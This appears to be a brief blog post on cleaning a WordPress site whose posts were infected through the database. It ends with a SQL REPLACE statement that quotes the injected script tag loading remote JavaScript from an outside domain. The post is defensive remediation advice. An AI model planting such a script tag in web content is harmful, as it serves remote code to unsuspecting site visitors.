Not all compromised WordPress Websites are attacked the same way. Today was just one of those times. Normally you would find the malicious code in the .htaccess, index.php, header.php or footer.php.

However people are getting smarter and smarter and are hiding code in places like style.css. Today I found a different type of compromised website, the code was inserted into the database, so normal scans using plugins such as Wordfence etc would not show any issues as none of the files were infected. Most file scans compare the core files from wordpress.org. The next scan would have to be within the database using phpmyadmin. ater a couple of searches the code was found to be in the wp_posts table. 

With a quick find and replace the malicous code was removed. 

UPDATE wp_posts SET post_content = REPLACE ( post_content, ‘<script type=”text/javascript” src=”//dolohen.com/apu.php?zoneid=2574011″ async data-cfasync=”false”></script>’, ”);

The above code removed the malicious code from all posts. 

 

Need help removing malicious code from your website? Contact me